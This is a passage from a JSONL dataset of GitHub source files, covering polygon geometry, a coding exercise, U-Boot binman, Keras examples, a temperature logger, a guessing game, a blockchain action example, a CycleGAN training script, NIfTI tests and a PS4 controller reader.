np.array(cp._polygon.exterior.coords)\n cp._polygon_global_pose = None\n cp._polygon_global = None\n return cp\n\n def point_location(self, x, input_frame=Frame.GLOBAL):\n x_obstacle = self.transform(x, input_frame, Frame.OBSTACLE)\n xmin, ymin, xmax, ymax = self._pol_bounds\n if not (xmin < x_obstacle[0] < xmax and ymin < x_obstacle[1] < ymax):\n return 1\n x_sh = shapely.geometry.Point(x_obstacle)\n if self._polygon.contains(x_sh):\n return -1\n if self._polygon.exterior.contains(x_sh):\n return 0\n return 1\n\n def line_intersection(self, line, input_frame=Frame.GLOBAL, output_frame=Frame.GLOBAL):\n l0_obstacle = self.transform(line[0], input_frame, Frame.OBSTACLE)\n l1_obstacle = self.transform(line[1], input_frame, Frame.OBSTACLE)\n intersection_points_shapely = shapely.geometry.LineString([l0_obstacle, l1_obstacle]).intersection(self._polygon.exterior)\n if intersection_points_shapely.is_empty:\n return []\n if intersection_points_shapely.geom_type == 'Point':\n intersection_points_obstacle = [np.array([intersection_points_shapely.x, intersection_points_shapely.y])]\n elif intersection_points_shapely.geom_type == 'MultiPoint':\n intersection_points_obstacle = [np.array([p.x, p.y]) for p in intersection_points_shapely.geoms]\n elif intersection_points_shapely.geom_type == 'LineString':\n intersection_points_obstacle = [np.array([ip[0], ip[1]]) for ip in intersection_points_shapely.coords]\n elif intersection_points_shapely.geom_type == 'MultiLineString':\n intersection_points_obstacle = [np.array([ip[0], ip[1]]) for line in intersection_points_shapely.geoms for ip in line.coords]\n else:\n print(intersection_points_shapely)\n return [self.transform(ip, Frame.OBSTACLE, output_frame) for ip in intersection_points_obstacle]\n\n def tangent_points(self, x, input_frame=Frame.GLOBAL, output_frame=Frame.GLOBAL):\n\n x_obstacle = self.transform(x, input_frame, Frame.OBSTACLE)\n t0 = tic()\n phi = np.arctan2(self.circular_vertices[:, 1] - x_obstacle[1], self.circular_vertices[:, 0] - x_obstacle[0])\n phi[phi < 0] += 2 * np.pi\n t1 = toc(t0)\n t0 = tic()\n phi_diff = np.diff(phi)\n t2 = toc(t0)\n t0 = tic()\n phi_decrease_idcs = phi_diff > np.pi\n phi_increase_idcs = phi_diff < -np.pi\n t3 = toc(t0)\n t0 = tic()\n phi_decrease_idcs = np.flatnonzero(phi_decrease_idcs)\n phi_increase_idcs = np.flatnonzero(phi_increase_idcs)\n for i in phi_decrease_idcs:\n phi[i+1:] -= 2*np.pi\n for i in phi_increase_idcs:\n phi[i+1:] += 2*np.pi\n t4 = toc(t0)\n\n t0 = tic()\n\n i_min, i_max = np.argmin(phi), np.argmax(phi)\n\n if abs(phi[0] - phi[-1]) > 0.00001:\n # Interior point\n return []\n if (phi[i_max] - phi[i_min]) >= 2*np.pi:\n # Blocked exterior point\n return []\n t5 = toc(t0)\n\n t0 = tic()\n tp1_obstacle = self.circular_vertices[i_max]\n tp2_obstacle = self.circular_vertices[i_min]\n\n tp1 = self.transform(tp1_obstacle, Frame.OBSTACLE, output_frame)\n tp2 = self.transform(tp2_obstacle, Frame.OBSTACLE, output_frame)\n\n tend = toc(t0)\n # print(sum([t1*100,t2*100,t3*100,t4*100,t5*100,tend*100*0]))\n return [tp1, tp2]\n\n def area(self):\n return self._polygon.area\n\n # ------------ Private methods ------------ #\n def _check_convexity(self):\n v = np.asarray(self._polygon.exterior.coords)[:-1, :]\n i = 0\n N = v.shape[0]\n # Make sure first vertice is not collinear\n while is_collinear(v[i-1, :], v[i, :], v[(i+1) % N, :]):\n i += 1\n if i > N:\n raise RuntimeError(\"Bad polygon shape. All vertices collinear\")\n # All vertices must be either cw or ccw when iterating through for convexity\n if is_cw(v[i-1, :], v[i, :], v[i+1, :]):\n self._is_convex = not any([is_ccw(v[j-1, :], v[j, :], v[(j+1) % N, :]) for j in range(v.shape[0])])\n else:\n self._is_convex = not any([is_cw(v[j-1, :], v[j, :], v[(j+1) % N, :]) for j in range(v.shape[0])])\n\n # Not needed\n def _compute_polygon_representation(self):\n pass\n","repo_name":"albindgit/starworlds","sub_path":"obstacles/polygon.py","file_name":"polygon.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22670667577","text":"def solution(name, yearning, photo):\n answer = []\n dic = {}\n score = 0\n for i in range(len(name)):\n dic[name[i]] = yearning[i]\n \n for i in range(len(photo)):\n score = 0\n for j in range(len(photo[i])):\n if photo[i][j] in dic.keys():\n score+= dic[photo[i][j]]\n else:\n continue;\n answer.append(score)\n return answer","repo_name":"kirin2211/Programmers-Lv1","sub_path":"프로그래머스/unrated/176963. 추억 점수/추억 점수.py","file_name":"추억 점수.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26372554032","text":"#Remove specified index from list and print\n\n\nclass Demo:\n def __init__(self):\n self.j=0\n def remove(self,a):\n i=int(input(\"enter the index to remove element from list \"))\n print(a[i],\"has been removed \")\n del a[i]\n print(\"the list after removing\",a)\n\n\nd=Demo()\n\na=[]\na1=int(input(\"how many values for a \"))\nfor i in range(0,a1):\n a2=int(input(\"enter the list values for a \"))\n a.append(a2)\nb=input(\"do u want to remove the element from list y/n\")\nif b==\"y\":\n d.remove(a)\n","repo_name":"Rakeshkumarlenka/test_functions","sub_path":"DECEMBER/LIST/Q12.Remove_specified_index.py","file_name":"Q12.Remove_specified_index.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41354242658","text":"from collections import OrderedDict\nimport os\n\nfrom binman.entry import Entry\nfrom dtoc import fdt_util\n\nclass Entry_collection(Entry):\n \"\"\"An entry which contains a collection of other entries\n\n Properties / Entry arguments:\n - content: List of phandles to entries to include\n\n This allows reusing the contents of other entries. The contents of the\n listed entries are combined to form this entry. This serves as a useful\n base class for entry types which need to process data from elsewhere in\n the image, not necessarily child entries.\n\n The entries can generally be anywhere in the same image, even if they are in\n a different section from this entry.\n \"\"\"\n def __init__(self, section, etype, node):\n super().__init__(section, etype, node)\n self.content = fdt_util.GetPhandleList(self._node, 'content')\n if not self.content:\n self.Raise(\"Collection must have a 'content' property\")\n\n def GetContents(self, required):\n \"\"\"Get the contents of this entry\n\n Args:\n required: True if the data must be present, False if it is OK to\n return None\n\n Returns:\n bytes content of the entry\n \"\"\"\n # Join up all the data\n self.Info('Getting contents, required=%s' % required)\n data = bytearray()\n for entry_phandle in self.content:\n entry_data = self.section.GetContentsByPhandle(entry_phandle, self,\n required)\n if not required and entry_data is None:\n self.Info('Contents not available yet')\n # Data not available yet\n return None\n data += entry_data\n\n self.Info('Returning contents size %x' % len(data))\n\n return data\n\n def ObtainContents(self):\n data = self.GetContents(False)\n if data is None:\n return False\n self.SetContents(data)\n return True\n\n def ProcessContents(self):\n # The blob may have changed due to WriteSymbols()\n data = self.GetContents(True)\n return self.ProcessContentsUpdate(data)\n","repo_name":"u-boot/u-boot","sub_path":"tools/binman/etype/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":3245,"dataset":"github-code","pt":"48"} +{"seq_id":"41991369300","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Activation\n\n# Create the sequential model (a linear stack of layers)\nmodel = Sequential([\n Dense(32, input_shape=(784,)),\n Activation('relu'),\n Dense(10),\n Activation('softmax'),\n])\n\n# Adding layers can also be done with add()\n# model = Sequential()\n# model.add(Dense(32, input_dim=784))\n# model.add(Activation('relu'))\n# model.add(Dense(10))\n# model.add(Activation('softmax'))\n\n# Specifying the input shape\nmodel = Sequential()\nmodel.add(Dense(32, input_dim=784))\n\n# Compiling - Parametrization of the model\n\n# For a multi-class classification problem\n# model.compile(optimizer='rmsprop',\n# loss='categorical_crossentropy',\n# metrics=['accuracy'])\n\n# For a binary classification problem\nmodel.compile(optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n# For a mean squared error regression problem\n# model.compile(optimizer='rmsprop',\n# loss='mse')\n\n# For custom metrics\n# import keras.backend as K\n\n# def mean_pred(y_true, y_pred):\n# return K.mean(y_pred) # mean function from TensorFlow\n\n# model.compile(optimizer='rmsprop',\n# loss='binary_crossentropy',\n# metrics=['accuracy', mean_pred])\n\n\n# Training the models: \n\n# For a single-input model with 2 classes (binary classification):\n\nmodel = Sequential()\nmodel.add(Dense(32, activation='relu', input_dim=100))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n# Generate dummy data\nimport numpy as np\ndata = np.random.random((1000, 100))\nlabels = np.random.randint(2, size=(1000, 1))\n\n# Train the model, iterating on the data in batches of 32 samples\nmodel.fit(data, labels, epochs=10, batch_size=32)\n\n\n# For a single-input model with 10 classes (categorical classification):\n\nmodel = Sequential()\nmodel.add(Dense(32, activation='relu', input_dim=100))\nmodel.add(Dense(10, activation='softmax'))\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n# Generate dummy data\nimport numpy as np\ndata = np.random.random((1000, 100))\nlabels = np.random.randint(10, size=(1000, 1))\n\n# Convert labels to categorical one-hot encoding\nimport keras\none_hot_labels = keras.utils.to_categorical(labels, num_classes=10)\n\n# Train the model, iterating on the data in batches of 32 samples\nmodel.fit(data, one_hot_labels, epochs=10, batch_size=32)\n\n\n","repo_name":"raul-arrabales/DeepLearning","sub_path":"keras/SeqModel.py","file_name":"SeqModel.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24564884873","text":"#!/usr/bin/env python\n## Raspberry Pi Temperature Log Analyzer - 2013 Jamie Aitken.\n\n\nimport datetime\nimport socket\nimport sys\nhostname = socket.gethostname()\nnow = datetime.datetime.now()\nnowtime = now.strftime('Y-%m-%d %H:%M')\nfile = open('/tmp/logs/templog', 'r')\noutfile = open('/home/pi/log/templog', 'w')\nwebfile = open('/home/pi/log/index.html','w')\nunits = 'Celsius'\ntemplist = []\ntemp = []\nargs = []\nline = file.readline()\ninfo = ['Date: ', 'Time: ', 'Temperature: ']\n\nfor arg in sys.argv:\n args.append(arg)\n\nwhile line != '':\n \n line = line.rstrip('\\n')\n templist.append(line)\n line = file.readline()\n\t\n\t\nfile.close\t\n\ndef initializetemps():\n sublist = []\n x = 0\n while x < len(templist):\n sublist = []\n data = templist[x]\n date = data.split(\":\")[1]\n sublist.append(date)\n time = data.split(\":\")[0]\n sublist.append(time)\n temps = float(data.split(\":\")[2])\n if len(args) > 1:\n if args[1] == '-f':\n global units\n units = 'Fahrenheit'\n sublist.append((temps * 9 / 5) + 32)\n else:\n print('Error.')\n return 0\n else:\n sublist.append(temps)\n temp.append(sublist)\n x = x + 1\n\ndef latestreading():\n global latesttemp\n global latesttime\n latesttemp = temp[len(temp) - 1][2]\n latesttime = temp[len(temp) -1][1]\n\ndef lastfive():\n global lastfi\n global lastfo\n global lastth\n global lasttw\n global laston\n lastfi = temp[len(temp) -2]\n lastfo = temp[len(temp) -3]\n lastth = temp[len(temp) -4]\n lasttw = temp[len(temp) -5]\n laston = temp[len(temp) -6]\n\ndef printdatetemp():\n y = 0\n while y < len(temp):\n z = 0\n while z < len(temp[y]):\n print(info[z], temp[y][z])\n z = z + 1\n y = y + 1\n \ndef averagetemp():\n global avg\n i = 0\n avg = 0.0\n while i < len(temp):\n avg = avg + temp[i][2]\n i = i + 1\n avg = round((avg / len(temp)),1)\n \n\ndef showmax():\n i= 0\n templist = []\n global maxnum\n global minnum\n while i < len(temp):\n templist.append(temp[i][2])\n i = i + 1\n maxnum = max(templist)\n minnum = min(templist)\n \n\ndef writeout():\n outfile.write('\\n---------------------------------------------------\\n')\n outfile.write('Temperature Log Report for ' + str(hostname) + '\\n')\n outfile.write('---------------------------------------------------\\n\\n')\n outfile.write('Report Generated: ' + str(now) +'\\n')\n outfile.write('Log Created: ' + str(temp[0][1]) + '\\n\\n')\n outfile.write('Latest Temperature (' + str(latesttime) + '): ' + str(latesttemp) + ' ' + str(units) + '\\n')\n outfile.write('Highest Recorded Temperature: ' + str(maxnum) + ' ' + str(units) + '\\n')\n outfile.write('Lowest Recorded Temperature: ' + str(minnum) + ' ' + str(units) + '\\n')\n outfile.write('Average Temperature: ' + str(avg) + ' ' + str(units) + '\\n\\n')\n## outfile.write('Previous Five Temperatures:\\n')\n## outfile.write(str(lastfi[1]) + ' ' + str(lastfi[2]) + ' Celsius\\n')\n## outfile.write(str(lastfo[1]) + ' ' + str(lastfo[2]) + ' Celsius\\n')\n## outfile.write(str(lastth[1]) + ' ' + str(lastth[2]) + ' Celsius\\n')\n## outfile.write(str(lasttw[1]) + ' ' + str(lasttw[2]) + ' Celsius\\n')\n## outfile.write(str(laston[1]) + ' ' + str(laston[2]) + ' Celsius\\n')\n outfile.close()\n\ndef genweb():\n webfile.write('\\n\\n\\n')\n webfile.write('\\n---------------------------------------------------

\\n')\n webfile.write('Temperature Log Report for ' + str(hostname) + '

\\n')\n webfile.write('---------------------------------------------------

\\n\\n')\n webfile.write('Report Generated: ' + str(now) +'

\\n')\n webfile.write('Log Created: ' + str(temp[0][1]) + '

\\n\\n')\n webfile.write('Latest Temperature (' + str(latesttime) + '): ' + str(latesttemp) + ' ' + str(units) + '

\\n')\n webfile.write('Highest Recorded Temperature: ' + str(maxnum) + ' ' + str(units) + '

\\n')\n webfile.write('Lowest Recorded Temperature: ' + str(minnum) + ' ' + str(units) + '

\\n')\n webfile.write('Average Temperature: ' + str(avg) + ' ' + str(units) + '

\\n\\n')\n webfile.write('\\n\\n')\n webfile.close()\n\n\nprint('Generating Logfile...')\ninitializetemps()\nlatestreading()\naveragetemp()\nlastfive()\nshowmax()\nwriteout()\ngenweb()\nprint('Logfile Generation Complete.')\n","repo_name":"sudoecho/templogger","sub_path":"templogoutput.py","file_name":"templogoutput.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26781676070","text":"import random\n\nMAX_GUESSES = 5\nSTART, END = 1, 20\n\n\ndef get_random_number():\n \"\"\"Get a random number between START and END, returns int\"\"\"\n return random.randint(START, END)\n\n\nclass Game:\n \"\"\"Number guess class, make it callable to initiate game\"\"\"\n\n def __init__(self):\n \"\"\"Init _guesses, _answer, _win to set(), get_random_number(), False\"\"\"\n self._guesses = set()\n self._answer = get_random_number()\n self._win = False\n\n def guess(self):\n \"\"\"Ask user for input, convert to int, raise ValueError outputting\n the following errors when applicable:\n 'Please enter a number'\n 'Should be a number'\n 'Number not in range'\n 'Already guessed'\n If all good, return the int\"\"\"\n guess = input()\n try:\n guess_int = int(guess)\n except:\n raise ValueError(\"Please enter a number\")\n\n if guess_int in self._guesses:\n raise ValueError(\"Already guessed\")\n elif guess_int < 1 or guess_int > 20:\n raise ValueError(\"Number not in range\")\n else:\n self._guesses.add(guess_int)\n\n return guess_int\n\n def _validate_guess(self, guess):\n \"\"\"Verify if guess is correct, print the following when applicable:\n {guess} is correct!\n {guess} is too low\n {guess} is too high\n Return a boolean\"\"\"\n if guess > self._answer:\n print(f\"{guess} is too high\")\n elif guess < self._answer:\n print(f\"{guess} is too low\")\n else:\n print(f\"{guess} is correct!\")\n return True\n return False\n\n def __call__(self):\n \"\"\"Entry point / game loop, use a loop break/continue,\n see the tests for the exact win/lose messaging\"\"\"\n guess_count = 0\n while not self._win and guess_count < 5:\n try:\n guess = self.guess()\n except ValueError as e:\n print(e.args[0])\n continue\n\n if self._validate_guess(guess):\n self._win = True\n print(f\"It took you {guess_count+ 1} guesses\")\n guess_count += 1\n\n if not self._win:\n print(f\"Guessed 5 times, answer was {self._answer}\")\n ...\n\n\nif __name__ == \"__main__\":\n game = Game()\n game()\n","repo_name":"kaysagoe/pybites","sub_path":"42/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34366690592","text":"\"\"\"Run a `runjob` action.\"\"\"\r\n\r\n\r\nimport pyntelope\r\n\r\n\r\ndata = [\r\n pyntelope.Data(\r\n name=\"worker\",\r\n value=pyntelope.types.Name(\"open.facings\"),\r\n ),\r\n pyntelope.Data(\r\n name=\"nonce\",\r\n value=pyntelope.types.Uint64(123),\r\n ),\r\n]\r\n\r\nauth = pyntelope.Authorization(actor=\"youraccount\", permission=\"active\")\r\n\r\naction = pyntelope.Action(\r\n account=\"open.facings\",\r\n name=\"runjobs\",\r\n data=data,\r\n authorization=[auth],\r\n)\r\n\r\nraw_transaction = pyntelope.Transaction(actions=[action])\r\n\r\nnet = pyntelope.WaxTestnet()\r\nlinked_transaction = raw_transaction.link(net=net)\r\n\r\nkey = \"a_very_secret_key\"\r\nsigned_transaction = linked_transaction.sign(key=key)\r\n\r\nresp = signed_transaction.send()\r\n","repo_name":"FACINGS/pyntelope","sub_path":"examples/run_a_simple_action.py","file_name":"run_a_simple_action.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"17827435405","text":"import os\nfrom os.path import join as opj\nimport argparse\nimport time\nfrom datetime import datetime\n\nimport cv2\nimport torch\nimport torch.distributed as dist\n\nfrom datasets.dataloader import get_dataloader, get_test_dataloader\nfrom utils.util import *\nfrom models.cyclegan import AttentionCycleGAN\n\n\ndef build_args(is_test=False):\n parser = argparse.ArgumentParser()\n\n #### dataset ####\n parser.add_argument(\"--data_root_dir\", type=str, default=\"/home/data/\")\n parser.add_argument(\"--data_name\", type=str, default=\"horse2zebra\")\n parser.add_argument(\"--in_ch\", type=int, default=3)\n parser.add_argument(\"--out_ch\", type=int, default=3)\n parser.add_argument(\"--use_crop_A\", type=bool, default=False)\n parser.add_argument(\"--use_crop_B\", type=bool, default=False)\n parser.add_argument(\"--resize_type\", type=str, default=\"scale_height\", choices=[\"resize\", \"scale_height\"])\n parser.add_argument(\"--resize_H\", type=int, default=1080, help=\"scale 또는 crop있을 때 resize할때 사이즈\")\n parser.add_argument(\"--resize_W\", type=int, default=1920)\n parser.add_argument(\"--img_H\", type=int, default=512)\n parser.add_argument(\"--img_W\", type=int, default=512, help=\"crop할때 이미지 사이즈. crop안하면 이거로 resize\")\n \n #### model ####\n parser.add_argument(\"--G_attn_A_name\", type=str, default=\"basic_attn\")\n parser.add_argument(\"--G_attn_B_name\", type=str, default=\"basic_attn\")\n parser.add_argument(\"--G_AB_name\", type=str, default=\"res_9blks\")\n parser.add_argument(\"--G_BA_name\", type=str, default=\"res_9blks\")\n parser.add_argument(\"--D_AB_name\", type=str, default=\"basic\")\n parser.add_argument(\"--D_BA_name\", type=str, default=\"basic\")\n\n #### train ####\n parser.add_argument(\"--batch_size\", type=int, default=1)\n parser.add_argument(\"--n_workers\", type=int, default=4)\n parser.add_argument(\"--start_epoch\", type=int, default=1)\n parser.add_argument(\"--n_epochs\", type=int, default=10000)\n parser.add_argument(\"--linearlr_epochs\", type=int, default=50, help=\"linear decay ratio for linear lr scheduler\")\n parser.add_argument(\"--target_real_label\", type=float, default=1.0)\n parser.add_argument(\"--target_gene_label\", type=float, default=0.0)\n parser.add_argument(\"--G_lr\", type=float, default=2e-4)\n parser.add_argument(\"--D_lr\", type=float, default=2e-4)\n parser.add_argument(\"--G_betas\", type=tuple, default=(0.5, 0.999))\n parser.add_argument(\"--D_betas\", type=tuple, default=(0.5, 0.999))\n parser.add_argument(\"--gan_loss_name\", type=str, default=\"lsgan\", choices=[\"lsgan\", \"wgangp\", \"vanilla\"])\n parser.add_argument(\"--lr_scheduler\", type=str, default=\"linear\", choices=[\"linear\", \"step\", \"plateau\", \"cosine\"])\n parser.add_argument(\"--lambda_ID\", type=float, default=0.5)\n parser.add_argument(\"--lambda_A\", type=float, default=10.0)\n parser.add_argument(\"--lambda_B\", type=float, default=10.0)\n parser.add_argument(\"--pool_size\", type=int, default=50)\n parser.add_argument(\"--no_vgg\", action=\"store_true\")\n parser.add_argument(\"--attn_thres\", type=float, default=0.1)\n parser.add_argument(\"--use_mask_for_D\", type=bool, default=False, help=\"True이면 논문의 equation 7을 사용한다. 즉, D에 들어갈때 mask를 적용해서 들어간다. 그런데 thresh는 적용이 안됨.\") \n parser.add_argument(\"--stop_attn_learning_epoch\", type=int, default=30, help=\"이 에폭이후로 attn은 학습 안됨.\")\n\n #### save ####\n parser.add_argument(\"--no_save\", action=\"store_true\")\n parser.add_argument(\"--save_root_dir\", type=str, default=\"/media/data1/jeonghokim/VFP290K_GAN/save/cyclegan_attention\")\n parser.add_argument(\"--save_name\", type=str, default=f\"{datetime.now().strftime('%Y%m%d')}\")\n parser.add_argument(\"--log_save_iter_freq\", type=int, default=100)\n parser.add_argument(\"--img_save_iter_freq\", type=int, default=100)\n parser.add_argument(\"--model_save_iter_freq\", type=int, default=500)\n parser.add_argument(\"--n_save_images\", type=int, default=8)\n\n #### config ####\n parser.add_argument(\"--use_DDP\", type=bool, default=False)\n args = parser.parse_args()\n args.is_test = is_test\n if is_test:\n args.use_DDP = False\n args.no_save = True\n if args.use_DDP: args.local_rank = int(os.environ[\"LOCAL_RANK\"])\n else: args.local_rank = 0\n args.save_dir = opj(args.save_root_dir, args.save_name)\n args.img_save_dir = opj(args.save_dir, \"save_images\")\n args.model_save_dir = opj(args.save_dir, \"save_models\")\n args.log_path = opj(args.save_dir, \"log.txt\")\n args.config_path = opj(args.save_dir, \"config.json\")\n if not args.no_save:\n os.makedirs(args.img_save_dir, exist_ok=True)\n os.makedirs(args.model_save_dir, exist_ok=True)\n os.makedirs(opj(args.img_save_dir, \"A2B\"), exist_ok=True)\n os.makedirs(opj(args.img_save_dir, \"B2A\"), exist_ok=True)\n return args\n\ndef main_worker(args, logger):\n train_loader, valid_loader = get_dataloader(args)\n args.total_iter = args.n_epochs * len(train_loader)\n logger.write(f\"[Train] # of imgs A : {train_loader.dataset.n_A}, # of imgs B : {train_loader.dataset.n_B}\")\n logger.write(f\"[Valid] # of imgs A : {valid_loader.dataset.n_A}, # of imgs B : {valid_loader.dataset.n_B}\")\n logger.write(f\"1 epoch = {len(train_loader)} iters\")\n model = AttentionCycleGAN(args)\n cur_iter = 1\n start_time = time.time()\n for epoch in range(args.start_epoch, args.n_epochs+1):\n loss_G_meter = AverageMeter()\n loss_D_meter = AverageMeter()\n for data in train_loader:\n img_A = data['img_A'].cuda(args.local_rank)\n img_B = data[\"img_B\"].cuda(args.local_rank)\n model.set_input(img_A, img_B)\n model.train(epoch)\n\n BS = img_A.shape[0]\n loss_G_meter.update(model.loss_G.item(), BS)\n loss_D_meter.update(model.loss_D.item(), BS)\n if cur_iter % args.log_save_iter_freq == 0:\n msg = f\"[iter - {cur_iter}/{args.total_iter}]_[time - {time.time() - start_time:.2f}sec]_[loss G - {loss_G_meter.avg:.4f}]_[loss D - {loss_D_meter.avg:.4f}]\"\n logger.write(msg)\n if cur_iter % args.img_save_iter_freq <= args.n_save_images:\n real_A_img = tensor2img(img_A)\n real_B_img = tensor2img(img_B)\n gene_A_img = tensor2img(model.gene_A)\n gene_B_img = tensor2img(model.gene_B)\n attn_A_img = tensor2img(model.attn_A_viz)\n attn_B_img = tensor2img(model.attn_B_viz)\n A2B_to_path = opj(args.img_save_dir, \"A2B\", f\"{cur_iter}_{cur_iter % args.img_save_iter_freq}.png\")\n A2B_save_img = np.concatenate([real_A_img, real_B_img, gene_B_img, attn_A_img], axis=1)\n if args.local_rank == 0:\n cv2.imwrite(A2B_to_path, A2B_save_img[:,:,::-1])\n \n B2A_to_path = opj(args.img_save_dir, \"B2A\", f\"{cur_iter}_{cur_iter % args.img_save_iter_freq}.png\")\n B2A_save_img = np.concatenate([real_B_img, real_A_img, gene_A_img, attn_B_img], axis=1)\n if args.local_rank == 0:\n cv2.imwrite(B2A_to_path, B2A_save_img[:,:,::-1])\n \n if cur_iter % args.model_save_iter_freq == 0:\n to_path = opj(args.model_save_dir, f\"[iter - {cur_iter}].pth\")\n model.save(to_path)\n cur_iter += 1\n model.scheduler_G.step()\n model.scheduler_D.step()\n G_lr_val = get_lr(model.optimizer_G)\n D_lr_val = get_lr(model.optimizer_D)\n msg = f\"[Epoch - {epoch}/{args.n_epochs}]_[time - {time.time() - start_time:.2f}sec]_[loss G - {loss_G_meter.avg:.4f}]_[loss D - {loss_D_meter.avg:.4f}]_[G lr - {G_lr_val}]_[D lr - {D_lr_val}]\"\n logger.write(msg)\n \n\nif __name__ == \"__main__\":\n args = build_args()\n logger = Logger(args.local_rank)\n logger.open(\"asd.txt\")\n print_args(args, logger)\n save_args(args, args.config_path)\n if args.use_DDP:\n torch.cuda.set_device(args.local_rank)\n dist.init_process_group(backend=\"nccl\")\n main_worker(args, logger)\n \n","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/Attention_CycleGAN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33551585682","text":"from pndni import forceqform\nimport nibabel\nimport numpy as np\nimport pytest\n\n\ndef test_ang():\n x = np.array([1.0, 0.0, 0.0])\n y = np.array([0.0, 2.0, 0.0])\n z = np.array([0.0, 0.0, 3.0])\n for i in [x, y, z]:\n for j in [x, y, z]:\n if i is j:\n assert np.allclose(forceqform._ang(i, j), np.pi / 2)\n else:\n assert np.allclose(forceqform._ang(i, j), 0)\n\n\ndef test_check_ang():\n R1 = np.array([[1.0, -2.0, 0.0],\n [1.0, 2.0, 0.0],\n [0.0, 0.0, 3.0]])\n forceqform._check_ang(R1, 1e-6)\n R2 = np.array([[1.0, 0.0, 0.0],\n [1.0, 2.0, 0.0],\n [0.0, 0.0, 3.0]])\n with pytest.raises(RuntimeError):\n forceqform._check_ang(R2, 1e-6)\n with pytest.raises(RuntimeError):\n forceqform._check_ang(R2, np.pi / 4 - 0.01)\n forceqform._check_ang(R2, np.pi / 4 + 0.01)\n\n\n@pytest.mark.parametrize('testtype,shear,maxang', [('qform', False, None),\n ('sform', False, None),\n ('both', False, None),\n ('none', False, None),\n ('sform', True, None),\n ('sform', True, np.pi)])\ndef test_forceqform(tmp_path, testtype, shear, maxang):\n i1 = tmp_path / 'image1.nii'\n affine = np.array([[1.0, 0.0, 0.0, -20.0],\n [0.0, 2.0, 0.0, -30.0],\n [0.0, 0.0, 4.0, -40.0],\n [0.0, 0.0, 0.0, 1.0]])\n if shear:\n affine[0, 2] = 2.0\n img = np.arange(24).reshape(2, 3, 4)\n nii = nibabel.Nifti1Image(img, None)\n\n if testtype == 'qform':\n nii.set_qform(affine)\n elif testtype == 'sform':\n nii.set_sform(affine)\n elif testtype == 'both':\n nii.set_qform(affine)\n nii.set_sform(affine * 2)\n elif testtype == 'none':\n pass\n else:\n raise RuntimeError()\n nii.to_filename(str(i1))\n parser = forceqform.get_parser()\n toparse = [str(i1), str(tmp_path / 'out.nii')]\n if maxang is not None:\n toparse.extend(['--maxangle', str(maxang)])\n args = parser.parse_args(toparse)\n if testtype != 'none' and not (shear and maxang is None):\n forceqform.forceqform(args.input_file, args.output_file, maxangle=args.maxangle)\n else:\n with pytest.raises(RuntimeError):\n forceqform.forceqform(args.input_file, args.output_file, maxangle=args.maxangle)\n return\n nout = nibabel.load(str(args.output_file))\n if maxang is None:\n assert np.all(nout.affine == affine)\n assert np.all(nout.get_qform() == affine)\n assert nout.get_sform(coded=True)[1] == 0\n","repo_name":"pndni/pndni_utils","sub_path":"tests/test_forceqform.py","file_name":"test_forceqform.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3912065472","text":"import pprint\nimport pygame\nimport time\nimport queue\n\nclass PS4Controller(object):\n \"\"\"Class representing the PS4 controller. Pretty straightforward functionality.\"\"\"\n\n controller = None\n axis_data = None\n button_data = None\n hat_data = None\n mailbox = None\n debug = 0\n\n def init(self, mailbox):\n \"\"\"Initialize the joystick components\"\"\"\n pygame.init()\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n self.mailbox = mailbox\n\n def listen(self):\n \"\"\"Listen for events to happen\"\"\"\n \n if not self.axis_data:\n self.axis_data = {}\n\n if not self.button_data:\n self.button_data = {}\n for i in range(self.controller.get_numbuttons()):\n self.button_data[i] = False\n\n if not self.hat_data:\n self.hat_data = {}\n for i in range(self.controller.get_numhats()):\n self.hat_data[i] = (0, 0)\n\n while True:\n time.sleep(.1)\n for event in pygame.event.get():\n if event.type == pygame.JOYAXISMOTION:\n self.axis_data[event.axis] = round(event.value,2)\n elif event.type == pygame.JOYBUTTONDOWN:\n self.button_data[event.button] = True\n if event.button == 0:\n self.mailbox.put(\"square\")\n elif event.button == 1:\n self.mailbox.put(\"cross\")\n elif event.button == 2:\n self.mailbox.put(\"circle\")\n elif event.button == 3:\n self.mailbox.put(\"triangle\")\n elif event.button == 4:\n self.mailbox.put(\"L1\")\n elif event.button == 5:\n self.mailbox.put(\"R1\")\n elif event.button == 8:\n self.mailbox.put(\"select\")\n elif event.button == 9:\n self.mailbox.put(\"start\")\n #0: square\n #1: cross\n #2: circle\n #3: triangle\n #4: L1\n #5: R1\n #8: Share\n #9: Options\n if self.debug == 1: print(event.button)\n elif event.type == pygame.JOYBUTTONUP:\n self.button_data[event.button] = False\n elif event.type == pygame.JOYHATMOTION:\n self.hat_data[event.hat] = event.value\n\nif __name__ == \"__main__\":\n ps4 = PS4Controller()\n 